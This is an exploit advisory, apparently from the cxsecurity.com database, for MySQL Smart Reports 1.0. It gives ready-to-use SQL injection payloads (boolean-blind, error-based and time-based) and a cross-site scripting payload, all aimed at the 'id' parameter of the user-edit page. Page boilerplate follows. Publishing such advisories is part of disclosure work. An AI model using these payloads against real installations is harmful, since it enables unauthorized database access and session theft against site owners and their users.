MySQL Smart Reports 1.0 Cross Site Scripting / SQL Injection

2018.05.24
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79

# Exploit Title: MySQL Smart Reports 1.0 - SQL Injection / Cross-Site Scripting # Dork: N/A # Date: 22.05.2018 # Exploit Author: Azkan Mustafa AkkuA (AkkuS) # Vendor Homepage: https://codecanyon.net/item/mysql-smart-reports-online-report-generator-with-existing-data/16836503 # Version: 1.0 # Category: Webapps # Tested on: Kali linux # Description : It is actually a post request sent by the user to update. You do not need to use post data. You can injection like GET method. ==================================================== # PoC : SQLi : Parameter : id Type : boolean-based blind Demo : http://test.com/MySQLSmartReports/system-settings-user-edit2.php?add=true&id=1 Payload : add=true&id=9' RLIKE (SELECT (CASE WHEN (8956=8956) THEN 9 ELSE 0x28 END))-- YVFC Type : error-based Demo : http://test.com/MySQLSmartReports/system-settings-user-edit2.php?add=true&id=1 Payload : add=true&id=9' AND (SELECT 3635 FROM(SELECT COUNT(*),CONCAT(0x716a6a7671,(SELECT (ELT(3635=3635,1))),0x7176627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- HEMo Type : AND/OR time-based blind Demo : http://test.com/MySQLSmartReports/system-settings-user-edit2.php?add=true&id=1 Payload : add=true&id=9' AND SLEEP(5)-- mcFO ==================================================== # PoC : XSS : Payload : http://test.com/MySQLSmartReports/system-settings-user-edit2.php?add=true&id=' </script><script>alert(1)</script>a;


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top